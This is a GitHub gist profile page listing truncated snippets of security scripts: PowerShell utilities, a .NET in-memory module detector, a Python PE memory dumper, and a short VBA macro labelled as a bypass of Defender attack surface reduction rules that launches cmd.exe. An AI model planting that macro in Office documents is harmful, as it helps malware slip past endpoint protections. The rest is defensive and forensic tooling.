Skip to content

Instantly share code, notes, and snippets.

View davehull's full-sized avatar

Dave Hull davehull

View GitHub Profile
@davehull
davehull / ConvertTo-DelimiterSeparatedValues.ps1
Created March 13, 2017 15:48
ConvertTo-DelimiterSeparatedValues
function ConvertTo-DelimiterSeparatedValues {
<#
This function is like ConverTo-CSV but with
support for multi-character delimiters. The
function will return noteproperty names as
a header row.
#>
param(
[Parameter(Mandatory=$True,ValueFromPipeLine=$True,Position=0)]
[pscustomobject[]]$arrObject,
function Get-ClrReflection
{
<#
.SYNOPSIS
Detects memory-only CLR (.NET) modules
Author: Joe Desimone (@dez_)
License: BSD 3-Clause
@davehull
davehull / Get-NetDetails.ps1
Created August 17, 2018 17:41
Netstat like data with hashes from PowerShell
[CmdletBinding()]
Param(
[Parameter(Mandatory=$False,Position=0)]
[String]$TargetHostname,
[Parameter(Mandatory=$False,Position=1)]
[String]$HashAlgorithm
)
## We will handle errors via Try/Catch
$ErrorActionPreference = 'Stop'
@davehull
davehull / ASR Rules Bypass.vba
Created March 4, 2019 16:04
ASR rules bypass creating child processes
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub
@davehull
davehull / memdumppe.py
Created July 18, 2020 04:05 — forked from williballenthin/memdumppe.py
Dump some PE file features from memory images.
#!/usr/bin/env python2
'''
Dump some PE file features from memory images.
author: Willi Ballenthin
email: [email protected]
website: https://gist.github.com/williballenthin/cbc102d561e2eb647f7aec3c3753ba55
'''
import os
import sys
@davehull
davehull / list.md
Created August 13, 2022 22:53 — forked from ih2502mk/list.md
Quantopian Lectures Saved